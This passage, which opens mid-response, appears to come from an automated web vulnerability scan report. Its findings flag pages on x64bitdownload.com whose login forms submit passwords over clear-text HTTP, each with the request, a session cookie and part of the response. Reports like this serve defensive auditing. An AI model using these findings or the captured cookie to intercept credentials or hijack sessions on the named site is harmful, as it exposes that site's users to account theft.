Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.183. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-newsgroups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.184. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.185. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-newsreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.186. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.187. http://www.x64bitdownload.com/64-bit-nntp-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-nntp-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.188. http://www.x64bitdownload.com/64-bit-nzb-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nzb-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-nzb-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.189. http://www.x64bitdownload.com/64-bit-ozum-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ozum-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-ozum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.190. http://www.x64bitdownload.com/64-bit-par-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-par-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-par-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.191. http://www.x64bitdownload.com/64-bit-podcast-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-podcast-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-podcast-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.192. http://www.x64bitdownload.com/64-bit-posts-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-posts-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-posts-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22posts%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89038


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.193. http://www.x64bitdownload.com/64-bit-rar-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rar-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-rar-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.194. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.195. http://www.x64bitdownload.com/64-bit-reader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.196. http://www.x64bitdownload.com/64-bit-reading-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reading-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-reading-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.197. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.198. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-client-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-rss-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.199. http://www.x64bitdownload.com/64-bit-rss-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-rss-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
